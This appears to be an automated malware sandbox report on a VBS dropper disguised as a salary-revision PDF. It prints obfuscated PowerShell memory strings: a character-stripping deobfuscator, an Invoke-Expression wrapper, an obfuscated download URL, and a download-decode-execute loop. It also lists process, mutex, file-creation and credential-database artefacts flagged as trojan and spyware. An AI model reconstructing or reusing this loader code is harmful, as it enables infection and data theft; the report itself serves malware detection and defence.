UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4so
Source: powershell.exe, 00000002.00000002.1531059954.000001C4FCFD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. Te2q)
Source: powershell.exe, 00000002.00000002.1532176181.000001C4FD0A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"t
Source: wscript.exe, 00000000.00000002.1357482533.0000023D99859000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
Source: powershell.exe, 00000004.00000002.1636903665.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWinsta0\Default
Source: powershell.exe, 00000002.00000002.1530040187.000001C4FCDB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tly=29527;vandende (adiabaticlly ' dr$ ong ll lio beb ybaa.slnar:limb tiyyetdfireeftlkets frftrio,israposovegmeres ttse. sal=sto sang s.eburts.o-supcsypobrin .itpene h n.ntth n tis$skrb neegaltparakvalskai non u gbene afrlogscal ');vandende (adiabaticlly ' vg$ r !
Source: wscript.exe, 00000000.00000003.1354223614.0000023D997D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354005111.0000023D997C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A
Source: msiexec.exe, 00000007.00000002.2632696705.0000000004356000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: pOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal
Source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: B ybAA.slNar:LimB 49-
Source: wscript.exe, 00000000.00000003.1353897138.0000023D9986B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sa&#
Source: powershell.exe	Binary or memory string: ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .it
Source: powershell.exe, 00000002.00000002.1532176181.000001C4FD09C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"rr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"ngs

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@16/12@2/3

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

11_2_004182CE

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,

13_2_00410DE1

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

11_2_00418758

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,

11_2_00413D4C

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,

11_2_004148B6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Taxlessly199.Cho

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_322i4ygj.2sk.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"

Source: C:\Windows\SysWOW64\msiexec.exe

System information queried: HandleInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7844

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
